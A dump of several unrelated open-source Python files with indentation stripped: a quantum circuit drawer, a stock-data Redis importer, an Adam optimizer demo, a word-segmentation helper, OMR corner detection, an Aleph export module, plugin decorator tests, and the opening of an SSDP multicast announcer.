# Columns: repo_name | path | copies | size | text | license | hash | line_mean | line_max | alpha_frac | autogenerated | ratio | config_test | has_no_keywords | few_assignments

# ==== File: ProjectQ-Framework/ProjectQ :: projectq/backends/_circuits/_drawer_matplotlib.py (license: apache-2.0) ====
# -*- coding: utf-8 -*-
# Copyright 2020 ProjectQ-Framework (www.projectq.ch)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Contains a compiler engine which generates matplotlib figures describing the
circuit.
"""
from builtins import input
import re
import itertools
from projectq.cengines import LastEngineException, BasicEngine
from projectq.ops import FlushGate, Measure, Allocate, Deallocate
from projectq.meta import get_control_count
from ._plot import to_draw
# ==============================================================================
def _format_gate_str(cmd):
param_str = ''
gate_name = str(cmd.gate)
if '(' in gate_name:
(gate_name, param_str) = re.search(r'(.+)\((.*)\)', gate_name).groups()
params = re.findall(r'([^,]+)', param_str)
params_str_list = []
for param in params:
try:
params_str_list.append('{0:.2f}'.format(float(param)))
except ValueError:
if len(param) < 8:
params_str_list.append(param)
else:
params_str_list.append(param[:5] + '...')
gate_name += '(' + ','.join(params_str_list) + ')'
return gate_name
# ==============================================================================
class CircuitDrawerMatplotlib(BasicEngine):
"""
    CircuitDrawerMatplotlib is a compiler engine which uses the Matplotlib
    library to draw quantum circuits.
"""
def __init__(self, accept_input=False, default_measure=0):
"""
        Initialize a circuit drawing engine (matplotlib).
Args:
accept_input (bool): If accept_input is true, the printer queries
the user to input measurement results if the CircuitDrawerMPL
is the last engine. Otherwise, all measurements yield the
result default_measure (0 or 1).
default_measure (bool): Default value to use as measurement
results if accept_input is False and there is no underlying
backend to register real measurement results.
"""
BasicEngine.__init__(self)
self._accept_input = accept_input
self._default_measure = default_measure
self._map = dict()
self._qubit_lines = {}
def is_available(self, cmd):
"""
Specialized implementation of is_available: Returns True if the
CircuitDrawerMatplotlib is the last engine
(since it can print any command).
Args:
cmd (Command): Command for which to check availability (all
Commands can be printed).
Returns:
availability (bool): True, unless the next engine cannot handle
the Command (if there is a next engine).
"""
try:
# Multi-qubit gates may fail at drawing time if the target qubits
# are not right next to each other on the output graphic.
return BasicEngine.is_available(self, cmd)
except LastEngineException:
return True
def _process(self, cmd): # pylint: disable=too-many-branches
"""
        Process the command cmd and store it in the internal storage.

        Queries the user for measurement input if a measurement command
        arrives and accept_input was set to True. Otherwise, it uses the
        default_measure parameter to register the measurement outcome.
Args:
cmd (Command): Command to add to the circuit diagram.
"""
# pylint: disable=R0801
if cmd.gate == Allocate:
qb_id = cmd.qubits[0][0].id
if qb_id not in self._map:
self._map[qb_id] = qb_id
self._qubit_lines[qb_id] = []
return
if cmd.gate == Deallocate:
return
if self.is_last_engine and cmd.gate == Measure:
if get_control_count(cmd) != 0:
raise ValueError('Cannot have control qubits with a measurement gate!')
for qureg in cmd.qubits:
for qubit in qureg:
if self._accept_input:
measurement = None
while measurement not in ('0', '1', 1, 0):
prompt = "Input measurement result (0 or 1) for qubit {}: ".format(qubit)
measurement = input(prompt)
else:
measurement = self._default_measure
self.main_engine.set_measurement_result(qubit, int(measurement))
targets = [qubit.id for qureg in cmd.qubits for qubit in qureg]
controls = [qubit.id for qubit in cmd.control_qubits]
ref_qubit_id = targets[0]
gate_str = _format_gate_str(cmd)
# First find out what is the maximum index that this command might
# have
max_depth = max(len(self._qubit_lines[qubit_id]) for qubit_id in itertools.chain(targets, controls))
# If we have a multi-qubit gate, make sure that all the qubit axes
# have the same depth. We do that by recalculating the maximum index
# over all the known qubit axes.
# This is to avoid the possibility of a multi-qubit gate overlapping
# with some other gates. This could potentially be improved by only
# considering the qubit axes that are between the topmost and
# bottommost qubit axes of the current command.
if len(targets) + len(controls) > 1:
max_depth = max(len(self._qubit_lines[qubit_id]) for qubit_id in self._qubit_lines)
for qb_id in itertools.chain(targets, controls):
depth = len(self._qubit_lines[qb_id])
self._qubit_lines[qb_id] += [None] * (max_depth - depth)
if qb_id == ref_qubit_id:
self._qubit_lines[qb_id].append((gate_str, targets, controls))
else:
self._qubit_lines[qb_id].append(None)
def receive(self, command_list):
"""
Receive a list of commands from the previous engine, print the
commands, and then send them on to the next engine.
Args:
command_list (list<Command>): List of Commands to print (and
potentially send on to the next engine).
"""
for cmd in command_list:
if not isinstance(cmd.gate, FlushGate):
self._process(cmd)
if not self.is_last_engine:
self.send([cmd])
def draw(self, qubit_labels=None, drawing_order=None, **kwargs):
"""
Generates and returns the plot of the quantum circuit stored so far
Args:
qubit_labels (dict): label for each wire in the output figure.
Keys: qubit IDs, Values: string to print out as label for
that particular qubit wire.
drawing_order (dict): position of each qubit in the output
graphic. Keys: qubit IDs, Values: position of qubit on the
qubit line in the graphic.
**kwargs (dict): additional parameters are used to update
the default plot parameters
Returns:
A tuple containing the matplotlib figure and axes objects
Note:
Additional keyword arguments can be passed to this
function in order to further customize the figure output
by matplotlib (default value in parentheses):
- fontsize (14): Font size in pt
- column_spacing (.5): Vertical spacing between two
neighbouring gates (roughly in inches)
- control_radius (.015): Radius of the circle for controls
- labels_margin (1): Margin between labels and begin of
wire (roughly in inches)
- linewidth (1): Width of line
- not_radius (.03): Radius of the circle for X/NOT gates
- gate_offset (.05): Inner margins for gates with a text
representation
- mgate_width (.1): Width of the measurement gate
- swap_delta (.02): Half-size of the SWAP gate
- x_offset (.05): Absolute X-offset for drawing within the axes
- wire_height (1): Vertical spacing between two qubit
wires (roughly in inches)
"""
max_depth = max(len(self._qubit_lines[qubit_id]) for qubit_id in self._qubit_lines)
for qubit_id in self._qubit_lines:
depth = len(self._qubit_lines[qubit_id])
if depth < max_depth:
self._qubit_lines[qubit_id] += [None] * (max_depth - depth)
return to_draw(
self._qubit_lines,
qubit_labels=qubit_labels,
drawing_order=drawing_order,
**kwargs,
)
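
# A minimal usage sketch (not part of the original module; it assumes the
# usual ProjectQ entry points such as MainEngine and the gate ops). The
# drawer sits in the engine list, records every command it receives, and
# draw() then returns the matplotlib figure and axes:
#
#   from projectq import MainEngine
#   from projectq.ops import H, CNOT, Measure
#
#   drawer = CircuitDrawerMatplotlib()
#   eng = MainEngine(engine_list=[drawer])
#   qureg = eng.allocate_qureg(2)
#   H | qureg[0]
#   CNOT | (qureg[0], qureg[1])
#   Measure | qureg[0]
#   eng.flush()
#   fig, axes = drawer.draw()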

# ==== File: kaija/taiwan_stockloader :: import.py (license: mit) ====
import datetime
import httplib
import urllib
import redis
import json
from datetime import timedelta
#now = datetime.datetime.now();
#today = now.strftime('%Y-%m-%d')
#print today
rdb = redis.Redis('localhost')
def isfloat(value):
try:
float(value)
return True
except ValueError:
return False
def convfloat(value):
try:
return float(value)
except ValueError:
return -1
def convint(value):
try:
return int(value)
except ValueError:
return 0
def save2redis(key, value):
old = rdb.get("TW" + key)
if old is None:
val = []
val.append(value)
rdb.set("TW"+key ,json.dumps(val))
else:
l = json.loads(old)
l.append(value)
rdb.set("TW"+key ,json.dumps(l))
today = datetime.date.today()
one_day = timedelta(days=1);
start_day = datetime.date(2004, 2, 11);
#start_day = datetime.date(2015, 5, 14);
print "Import from " + start_day.strftime("%Y-%m-%d") + " to " + today.strftime("%Y-%m-%d")
dl_date = start_day
stocks = {}
dl_date = start_day
print "Start merge history"
while dl_date < today:
file_name = "data/" + dl_date.strftime("%Y%m%d") + ".csv"
f = open(file_name, 'r')
print "open " + file_name
lines = f.readlines()
for line in lines:
r = line.split('","')
if len(r) == 16:
head = r[0].split("\"")
sid = head[1].strip(" ")
#print head[1] + " " + r[2] + " " + convfloat(r[5])
#print r[2] #volume
#print r[5] #open
obj = {"volume": convint(r[2]), "open": convfloat(r[5]), "high": convfloat(r[6]), "low": convfloat(r[7]), "val": convfloat(r[8]), "date": dl_date.strftime("%Y-%m-%d"), "per": convfloat(r[15]), "buyQuantity": convint(r[12]), "buyPrice": convint(r[11]), "saleQuantity": convint(r[14]), "salePrice": convint(r[13])}
save2redis(sid, obj)
dl_date += one_day
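
# Hedged readback sketch (not in the original script): save2redis() stores each
# stock id `sid` under the key "TW"+sid as a JSON list of per-day dicts, so the
# history can be recovered with something like ("2330" is an illustrative id):
#
#   import json, redis
#   rdb = redis.Redis('localhost')
#   history = json.loads(rdb.get("TW2330"))
#   for day in history:
#       print day["date"], day["open"], day["volume"]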

# ==== File: arcman77/banned4hax.github.io :: adam_opt_with_simple_func.py (license: mit) ====
import math as math
import random as random
def get_data(n_points = 300, m = 2, b = 7, variance = 5):
y_train = [(m * x + b + random.uniform(-variance, variance)) for x in range(0, n_points)]
# x = [(m * x + b) for x in range(0, n_points)]
x_train = [x for x in range(0, n_points)]
return [x_train, y_train]
def func(x, theta_vector):
return (theta_vector[0] * x) + theta_vector[1]
# theta_store = [[1, 1]]
m_store = [[0.0, 0.0]]
v_store = [[0.0, 0.0]]
b1 = 0.9
b2 = 0.99
e = math.pow(10, -8)
alpha = 0.001
# using mse as the loss function:
def gradient_of_mse_loss(y, x, t, theta_store):
theta_vector = theta_store[t - 1]
scalar = 2*(y - func(x, theta_vector))
# print('scalar: ', scalar)
return [-x * scalar, -1 * scalar]
def gt(t, data, theta_store):
x_train = data[0]
y_train = data[1]
gradient_loss_sum = [0, 0]
for i in range(1, len(x_train)):
y = y_train[i]
x = x_train[i]
curr_g = gradient_of_mse_loss(y, x, t, theta_store)
gradient_loss_sum[0] += curr_g[0]
gradient_loss_sum[1] += curr_g[1]
return [gradient_loss_sum[0] / len(x_train), gradient_loss_sum[1] / len(x_train)]
def mt(t, data, theta_store):
old_m = m_store[t - 1]
temp1 = [b1 * old_m[0], b1 * old_m[1]]
scale = (1 - b1)
curr_g = gt(t, data, theta_store)
temp2 = [scale * curr_g[0], scale * curr_g[1]]
new_mt = [ temp1[0] + temp2[0], temp1[1] + temp2[1]]
if len(m_store) <= t:
m_store.append(new_mt)
return new_mt
def mtc(t, data, theta_store):
curr_m = mt(t, data, theta_store)
denom = 1 - math.pow(b1, t)
return [curr_m[0] / denom, curr_m[1] / denom]
def vt(t, data, theta_store):
curr_g = gt(t, data, theta_store)
curr_g_sq = [math.pow(curr_g[0], 2), math.pow(curr_g[1], 2)]
temp1 = [b2 * v_store[t - 1][0], b2 * v_store[t - 1][1]]
scale = (1 - b2)
temp2 = [scale * curr_g_sq[0], scale * curr_g_sq[1]]
new_vt = [temp1[0] + temp2[0], temp1[1] + temp2[1]]
if len(v_store) <= t:
v_store.append(new_vt)
return new_vt
def vtc(t, data, theta_store):
curr_vt = vt(t, data, theta_store)
denom = 1 - math.pow(b2, t)
return [curr_vt[0] / denom, curr_vt[1] / denom]
def theta_t(t, data, theta_store):
old_theta = theta_store[t - 1]
m = mtc(t, data, theta_store)
v = vtc(t, data, theta_store)
temp1 = [-alpha * m[0], -alpha * m[1]]
temp2 = [math.pow(v[0], 0.5) + e, math.pow(v[1], 0.5) + e]
temp3 = [temp1[0] / temp2[0], temp1[1] / temp2[1]]
new_theta = [old_theta[0] + temp3[0], old_theta[1] + temp3[1]]
if len(theta_store) <= t:
theta_store.append(new_theta)
return new_theta
def adam():
data = get_data()
theta_store = [[1, 1]]
not_converged = True
old_t = theta_store[0]
t = 1
while not_converged:
theta = theta_t(t, data, theta_store)
diff = math.pow(old_t[0] - theta[0], 2) + math.pow(old_t[1] - theta[1], 2)
old_t = theta
# if diff < 0.0000000000000001:
if diff < e:
not_converged = False
t += 1
print(theta, t)
# print('theta_store: ', theta_store)
# print('m_store: ', m_store)
# print('v_store: ', v_store)
return theta
adam()
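
# For reference, the code above implements the standard Adam update
# (Kingma & Ba, 2015) per parameter, with b1, b2, alpha and e as defined above:
#   m_t = b1*m_{t-1} + (1 - b1)*g_t                          (mt)
#   v_t = b2*v_{t-1} + (1 - b2)*g_t^2                        (vt)
#   m_hat = m_t / (1 - b1^t),  v_hat = v_t / (1 - b2^t)      (mtc, vtc)
#   theta_t = theta_{t-1} - alpha * m_hat / (sqrt(v_hat) + e)   (theta_t)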

# ==== File: ExpResults/libweicws :: tools/script/ws.py (license: gpl-3.0) ====
#!/usr/bin/env python
unknownSample = "$NA$"
#####################################################################
# #
# Sentence class #
# #
#####################################################################
class Sentence:
default_encoding = "utf-8"
def __init__(self, raw, train=False, encoding="utf-8"):
self.raw = raw
self.sentence = "".join(raw.split()).decode(encoding).encode(self.default_encoding)
self.forms = [form.encode(self.default_encoding) for form in self.sentence.decode(encoding)]
self.tags = [unknownSample] * len(self.forms)
self.extra_tags = [unknownSample] * len(self.forms)
self.train = train
if train:
self.goldwords = self.raw.split()
self.goldtags = [unknownSample] * len(self.forms)
i = 0
for word in self.goldwords:
L = len(word.decode(self.default_encoding))
#print word, L
if L == 1:
self.goldtags[i] = "S"
else:
for j in range(L):
if j == 0:
self.goldtags[i + j] = "B"
elif j + 1 == L:
self.goldtags[i + j] = "E"
else:
self.goldtags[i + j] = "M"
i += L
def __str__(self):
L = len(self.forms)
if self.train:
return "\t".join(["%s_%s_%s_%s" % (self.forms[i],
self.goldtags[i],
self.tags[i],
self.extra_tags[i]) for i in range(L)])
else:
return "\t".join(["%s_%s_%s" % (self.forms[i],
self.tags[i],
self.extra_tags[i]) for i in range(L)])
def __len__(self):
return len(self.forms)
#####################################################################
# #
# Basic Segmemntor Class #
# #
# + segment #
# + valid #
# + tag_as_word #
# #
#####################################################################
class Segmentor:
def segment(self, sentence):
# for overwrite
pass
def valid(self, sentence, start, end):
ret = True
for i in range(start, end):
ret = ret and (sentence.tags[i] == unknownSample)
return ret
def tag_as_word(self, sentence, start, end, prefix, style):
if style == 2:
# tags in {"B", "I"} style
for i in range(start, end):
if i == start:
sentence.tags[i] = prefix + "B"
else:
sentence.tags[i] = prefix + "I"
elif style == 4:
# tag in {"B", "M", "E", "S"} style
if start + 1 == end:
sentence.tags[start] = prefix + "S"
else:
for i in range(start, end):
if i == start:
sentence.tags[i] = prefix + "B"
elif i + 1 == end:
sentence.tags[i] = prefix + "E"
else:
sentence.tags[i] = prefix + "M"
elif style == 6:
# tag in {"B0", "B1", "B2", "M", "E", "S"} style
pass
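
# Worked example of the gold BMES tagging above (illustrative input): for a
# training line "ab c de", the forms are ['a','b','c','d','e'] and the
# goldtags come out as ['B','E','S','B','E'] - two-character words get B/E,
# single characters get S, and longer words fill the middle with M.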

# ==== File: suhelhammoud/omr :: src/omr_detection_old.py (license: apache-2.0) ====
import numpy as np
import cv2
from matplotlib import pyplot as plt
class VPoint:
A = 0
B = 1
C = 2
D = 3
ERROR = 10000000
def __init__(self, cx, cy):
self.cx = cx
self.cy = cy
def which(self, x, y):
if x < self.cx:
if y < self.cy:
return VPoint.A
else:
return VPoint.D
else:
if y < self.cy:
return VPoint.B
else:
return VPoint.C
def otsu(img):
# global thresholding
# img = cv2.GaussianBlur(img, (11, 11), 0)
ret1, th1 = cv2.threshold(img, 127, 255, cv2.THRESH_BINARY)
# Otsu's thresholding
ret2, th2 = cv2.threshold(img, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
# Otsu's thresholding after Gaussian filtering
# blur = cv2.GaussianBlur(img, (5, 5), 0)
blur = cv2.medianBlur(img, 5, 0)
ret3, th3 = cv2.threshold(blur, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
# plot all the images and their histograms
images = [img, 0, th1,
img, 0, th2,
blur, 0, th3]
titles = ['Original Noisy Image', 'Histogram', 'Global Thresholding (v=127)',
'Original Noisy Image', 'Histogram', "Otsu's Thresholding",
'Gaussian filtered Image', 'Histogram', "Otsu's Thresholding"]
for i in range(3):
plt.subplot(3, 3, i * 3 + 1), plt.imshow(images[i * 3], 'gray')
plt.title(titles[i * 3]), plt.xticks([]), plt.yticks([])
plt.subplot(3, 3, i * 3 + 2), plt.hist(images[i * 3].ravel(), 256)
plt.title(titles[i * 3 + 1]), plt.xticks([]), plt.yticks([])
plt.subplot(3, 3, i * 3 + 3), plt.imshow(images[i * 3 + 2], 'gray')
plt.title(titles[i * 3 + 2]), plt.xticks([]), plt.yticks([])
plt.show()
def getSides(a):
# inverted = cv2.bitwise_not(a)
height, width = a.shape
xx = np.arange(width)
xy = np.arange(height)
a0 = np.argmax(a, axis=0)
a00 = np.argmax(a[::-1, :], axis=0)
a00 = height - a00
a1 = np.argmax(a, axis=1)
a11 = np.argmax(a[:, ::-1], axis=1)
a11 = width - a11
# a0 = np.nonzero(a0)
# a1 = np.nonzero(a1)
return xx, a0, a00, xy, a1, a11
def law_of_cosines(a, x, b):
xa = a - x
xc = b - x
# calculate angle
cosine_angle = np.dot(xa, xc) / (np.linalg.norm(xa) * np.linalg.norm(xc))
angle = np.arccos(cosine_angle)
return angle
# pAngle = np.degrees(angle)
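
# Worked example (illustrative values): with a = np.array([1, 0]),
# x = np.array([0, 0]) and b = np.array([0, 1]), the vectors xa and xc are
# orthogonal, the cosine is 0 and the returned angle is pi/2 (90 degrees
# after np.degrees).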
def border(img):
# global thresholding
# img = cv2.GaussianBlur(img, (11, 11), 0)
# Otsu's thresholding after Median filtering
blur = cv2.medianBlur(img, 17, 0)
ret3, th3 = cv2.threshold(blur, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
print('ret3 ' + str(ret3))
kernel = np.ones((30, 30), np.uint8)
dilate = cv2.dilate(th3, kernel, iterations=1)
dilate = th3
# h = th3.sum(0)
# v = th3.sum(1)
(xx, a0, a00, xy, a1, a11) = getSides(dilate)
# dh = np.diff(dh)
# dv = np.diff(dv)
# xh = np.arange(0, len(h))
# xdh = np.arange(0, len(dh))
plt.subplot(2, 2, 1)
plt.imshow(img, 'gray')
plt.title('original image'), plt.xticks([]), plt.yticks([])
# plt.subplot(3, 2, 2)
# plt.imshow(blur, 'gray')
# plt.title('median blure'), plt.xticks([]), plt.yticks([])
plt.subplot(2, 2, 3)
plt.imshow(th3, 'gray')
plt.title('otsu thresholding'), plt.xticks([]), plt.yticks([])
# plt.subplot(3, 4, 4)
# plt.imshow(a_r, 'gray')
# plt.title('reversed'), plt.xticks([]), plt.yticks([])
# plt.subplot(3,4,5)
# plt.plot(xx, a0,'r', xx, a00, 'g')
# plt.title('a0'), plt.xticks([]), plt.yticks([])
#
# plt.subplot(3,4,6)
# plt.plot(xy, a1, 'r', xy, a11, 'g')
# plt.title('a1'), plt.xticks([]), plt.yticks([])
plt.subplot(2, 2, 2)
nz0 = np.nonzero(a0)[0]
plt.plot(xx[nz0], a0[nz0], 'r', xx[nz0], a00[nz0], 'g')
plt.title('nz scan_x'), plt.xticks([]), plt.yticks([])
plt.subplot(2, 2, 4)
nz1 = np.nonzero(a1)[0]
plt.plot(a1[nz1], xy[nz1], 'r', a11[nz1], xy[nz1], 'g')
plt.title('nz scan_y'), plt.xticks([]), plt.yticks([])
plt.show()
def findCorners(img):
height, width = img.shape
cx = width / 2
cy = height / 2
vertex = VPoint(cx, cy)
print("cx = {cx}, cy = {cy}".format(**locals()))
xx = np.arange(width)
xy = np.arange(height)
scan_x = np.argmax(img, axis=0) # indexes of first white pixel
scan_xr = height - np.argmax(img[::-1, :], axis=0)
x_nz = np.nonzero(scan_x)[0]
scan_x_nz = scan_x[x_nz]
scan_xr_nz = scan_xr[x_nz]
np.save('../data/pickles/a', scan_x_nz)
# print(x_nz)
# print(scan_x_nz)
# print(scan_xr_nz)
# start finding vertexes
# lower line
x_left = x_nz[0]
y_left = scan_x_nz[0]
if y_left > cy:
y_left = scan_xr_nz[0]
x_right = x_nz[-1]
y_right = scan_x_nz[-1]
if y_right > cy:
y_right = scan_xr_nz[-1]
print(vertex.which(x_left, y_left))
print('x_left {x_left}, y_left {y_left}'.format(**locals()))
print(vertex.which(x_right, y_right))
print('x_right {x_right}, y_right {y_right}'.format(**locals()))
# min values for the lower line
ymin_index = np.argmin(scan_x_nz)
xmin = x_nz[ymin_index]
ymin = scan_x_nz[ymin_index]
print(vertex.which(xmin, ymin))
print("xmin = {xmin}, ymin = {ymin}".format(**locals()))
# max values for the upper line
ymax_index = np.argmax(scan_xr_nz)
xmax = x_nz[ymax_index]
ymax = scan_xr_nz[ymax_index]
print(vertex.which(xmax, ymax))
print("xmax = {xmax}, ymax = {ymax}".format(**locals()))
print('----------------')
scan_y = np.argmax(img, axis=1)
scan_yr = width - np.argmax(img[:, ::-1], axis=1)
y_nz = np.nonzero(scan_y)[0]
scan_y_nz = np.nonzero(scan_y)
scan_y_nz = scan_y[y_nz]
scan_yr_nz = scan_yr[y_nz]
yy_left = y_nz[0]
xx_left = scan_y_nz[0]
if xx_left > cx:
xx_left = scan_yr_nz[0]
yy_right = y_nz[-1]
xx_right = scan_y_nz[-1]
if xx_right > cx:
xx_right = scan_yr_nz[-1]
print(vertex.which(xx_left, yy_left))
print('xx_left {xx_left}, yy_left {yy_left}'.format(**locals()))
print(vertex.which(xx_right, yy_right))
print('xx_right {xx_right}, yy_right {yy_right}'.format(**locals()))
# min values for the lower line
xmin_index = np.argmin(scan_x_nz)
xmin = x_nz[ymin_index]
ymin = scan_x_nz[ymin_index]
print(vertex.which(xmin, ymin))
print("xmin = {xmin}, ymin = {ymin}".format(**locals()))
# max values for the upper line
ymax_index = np.argmax(scan_xr_nz)
xmax = x_nz[ymax_index]
ymax = scan_xr_nz[ymax_index]
print(vertex.which(xmax, ymax))
print("xmax = {xmax}, ymax = {ymax}".format(**locals()))
return (xx, scan_x, scan_xr, xy, scan_y, scan_yr)
if __name__ == '__main__':
file_path = '../data/colored/4.jpg'
img = cv2.imread(file_path, 0)
border(img)

# ==== File: alephdata/aleph :: aleph/logic/export.py (license: mit) ====
import os
import shutil
import logging
from pprint import pformat # noqa
from zipfile import ZipFile
from tempfile import mkdtemp
from flask import render_template
from normality import safe_filename
from followthemoney.helpers import entity_filename
from followthemoney.export.excel import ExcelExporter
from servicelayer.archive.util import checksum, ensure_path
from aleph.core import archive, db, settings
from aleph.queues import queue_task
from aleph.model import Export, Events, Role, Status, Entity
from aleph.index.entities import iter_proxies, checksums_count
from aleph.index.collections import get_collection
from aleph.logic.util import entity_url, ui_url, archive_url
from aleph.logic.notifications import publish
from aleph.logic.mail import email_role
log = logging.getLogger(__name__)
EXTRA_HEADERS = ["url", "collection"]
WARNING = """
This data export was aborted before it was complete, because the %s
exported entities exceeds the limits set by the system operators.
Contact the operator to discuss bulk exports.
"""
def get_export(export_id):
if export_id is None:
return
export = Export.by_id(export_id, deleted=True)
if export is not None:
return export.to_dict()
def write_document(export_dir, zf, collection, entity):
content_hash = entity.first("contentHash", quiet=True)
if content_hash is None:
return
file_name = entity_filename(entity)
arcname = "{0}-{1}".format(entity.id, file_name)
arcname = os.path.join(collection.get("label"), arcname)
log.info("Export file: %s", arcname)
try:
local_path = archive.load_file(content_hash, temp_path=export_dir)
if local_path is not None and os.path.exists(local_path):
zf.write(local_path, arcname=arcname)
finally:
archive.cleanup_file(content_hash, temp_path=export_dir)
def export_entities(export_id):
export = Export.by_id(export_id)
log.info("Export entities [%r]...", export)
export_dir = ensure_path(mkdtemp(prefix="aleph.export."))
collections = {}
try:
filters = [export.meta.get("query", {"match_none": {}})]
file_path = export_dir.joinpath("export.zip")
with ZipFile(file_path, mode="w") as zf:
excel_name = safe_filename(export.label, extension="xlsx")
excel_path = export_dir.joinpath(excel_name)
exporter = ExcelExporter(excel_path, extra=EXTRA_HEADERS)
proxies = iter_proxies(schemata=Entity.THING, filters=filters)
for idx, entity in enumerate(proxies):
collection_id = entity.context.get("collection_id")
if collection_id not in collections:
collections[collection_id] = get_collection(collection_id)
collection = collections[collection_id]
if collection is None:
continue
extra = [entity_url(entity.id), collection.get("label")]
exporter.write(entity, extra=extra)
write_document(export_dir, zf, collection, entity)
if file_path.stat().st_size >= settings.EXPORT_MAX_SIZE:
concern = "total size of the"
zf.writestr("EXPORT_TOO_LARGE.txt", WARNING % concern)
break
if idx >= settings.EXPORT_MAX_RESULTS:
concern = "number of"
zf.writestr("EXPORT_TOO_LARGE.txt", WARNING % concern)
break
exporter.finalize()
zf.write(excel_path, arcname=excel_name)
file_name = "Export: %s" % export.label
file_name = safe_filename(file_name, extension="zip")
complete_export(export_id, file_path, file_name)
except Exception:
log.exception("Failed to process export [%s]", export_id)
export = Export.by_id(export_id)
export.set_status(status=Status.FAILED)
db.session.commit()
finally:
shutil.rmtree(export_dir)
def create_export(
operation,
role_id,
label,
collection=None,
mime_type=None,
meta=None,
):
export = Export.create(
operation,
role_id,
label,
collection=collection,
mime_type=mime_type,
meta=meta,
)
db.session.commit()
return export
def complete_export(export_id, file_path, file_name):
export = Export.by_id(export_id)
file_path = ensure_path(file_path)
export.file_name = file_name
export.file_size = file_path.stat().st_size
export.content_hash = checksum(file_path)
try:
archive.archive_file(
file_path, content_hash=export.content_hash, mime_type=export.mime_type
)
export.set_status(status=Status.SUCCESS)
except Exception:
log.exception("Failed to upload export: %s", export)
export.set_status(status=Status.FAILED)
db.session.commit()
params = {"export": export}
role = Role.by_id(export.creator_id)
log.info("Export [%r] complete: %s", export, export.status)
publish(
Events.COMPLETE_EXPORT,
params=params,
channels=[role],
)
send_export_notification(export)
def delete_expired_exports():
"""Delete export files from the archive after their time
limit has expired."""
expired_exports = Export.get_expired(deleted=False)
for export in expired_exports:
log.info("Deleting expired export: %r", export)
if export.should_delete_publication():
if export.content_hash is not None:
counts = list(checksums_count([export.content_hash]))
if counts[0][1] == 0:
archive.delete_file(export.content_hash)
export.deleted = True
db.session.add(export)
db.session.commit()
def retry_exports():
for export in Export.get_pending():
queue_task(None, export.operation, export_id=export.id)
def send_export_notification(export):
download_url = archive_url(
export.content_hash,
file_name=export.file_name,
mime_type=export.mime_type,
expire=export.expires_at,
)
params = dict(
role=export.creator,
export_label=export.label,
download_url=download_url,
expiration_date=export.expires_at.strftime("%Y-%m-%d"),
exports_url=ui_url("exports"),
ui_url=settings.APP_UI_URL,
app_title=settings.APP_TITLE,
)
plain = render_template("email/export.txt", **params)
html = render_template("email/export.html", **params)
log.info("Notification: %s", plain)
subject = "Export ready for download"
email_role(export.creator, subject, html=html, plain=plain)
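
# Hedged lifecycle sketch (not part of the original module) wiring the
# functions above together; the operation name and query are illustrative:
#
#   export = create_export("EXPORT_SEARCH", role.id, "My search",
#                          meta={"query": {"match_all": {}}})
#   queue_task(None, export.operation, export_id=export.id)
#   # ...a worker then picks up the task and runs:
#   export_entities(export.id)  # builds the zip/xlsx and calls complete_export()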

# ==== File: igorsobreira/eizzek :: tests/unit/test_decorators.py (license: mit) ====
from unittest import TestCase
import re
from eizzek.lib.decorators import plugin, session_plugin
from eizzek.lib.registry import registry, session_registry
class PluginTest(TestCase):
def setUp(self):
registry.clear()
def test_plugin(self):
assert len(registry.plugins) == 0
@plugin(r'^ping (.+)$')
def ping(**kwargs):
return ''
assert len(registry.plugins) == 1
assert registry.plugins.has_key('ping')
def test_named_plugin(self):
assert len(registry.plugins) == 0
@plugin(r'^ping (.+)$', name='ping_plugin')
def ping(**kwargs):
return ''
assert len(registry.plugins) == 1
assert registry.plugins.has_key('ping_plugin')
class SessionPluginTest(TestCase):
def setUp(self):
session_registry.clear()
def test_create_session_plugin(self):
assert 0 == len(session_registry.plugins)
@session_plugin
class Translate(object):
name = 'translate'
regex = r'^translate (?P<something>\w+)$'
assert 1 == len(session_registry.plugins)
assert session_registry.plugins.has_key('translate')
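
# For reference, a sketch of the registration behaviour these tests pin down
# (the plugin body is illustrative): a decorated function lands in
# registry.plugins under its function name unless a `name` is given, keyed to
# its regex for later dispatch.
#
#   @plugin(r'^echo (?P<text>.+)$')
#   def echo(text=None):
#       return text
#
#   assert registry.plugins.has_key('echo')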

# ==== File: GrahamCobb/ssdp-fake :: ssdp-fake.py (license: gpl-2.0) ====
#!/usr/bin/python
# Copyright (C) 2014 Graham R. Cobb
# Released under GPL V2 -- see LICENSE
# Python multicast code taken from Stack Overflow (https://stackoverflow.com/questions/603852/multicast-in-python/1794373#1794373) by tolomea (https://stackoverflow.com/users/10471/tolomea) under CC BY-SA 3.0
# Other example code taken from Stack Overflow by Toddeman (under CC BY-SA 3.0), however it does not seem to be available any longer
import socket
import struct
import time
import select
import re
from optparse import OptionParser
VERSION='0.3'
DLNA_GRP = '239.255.255.250'
DLNA_PORT = 1900
MCAST_IF = '127.0.0.1'
CRLF = "\015\012"
#SERVER='192.168.0.238'
SERVER=''
UUID=''
URL=''
INTERVAL = 180
parser = OptionParser(usage="usage: %prog [options] server\n %prog --listen-only",
epilog="Server can be specified as hostname or IP address and should be omitted if --listen-only is used",
version="%prog "+VERSION)
parser.add_option("-a", "--all",
action="store_true", dest="allif", default=False,
help="send announcements to all interfaces, not just the loopback interface")
parser.add_option("-i", "--interval", type="int", dest="interval", default=INTERVAL,
help="seconds between notification updates (default %default)")
parser.add_option("-l", "--listen-only",
action="store_true", dest="listen", default=False,
help="just listen and display messages seen, do not contact a server or send announcements")
(options, args) = parser.parse_args()
LISTEN=options.listen
if len(args) == 0 and not LISTEN:
parser.error("server must be specified (hostname or IP address)")
if len(args) > 1:
parser.error("incorrect number of arguments")
if not LISTEN:
SERVER=args[0]
INTERVAL=options.interval
osock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
osock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
osock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 4)
osock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_LOOP, 1)
if not options.allif:
mreq = struct.pack("4sl", socket.inet_aton(MCAST_IF), socket.INADDR_ANY)
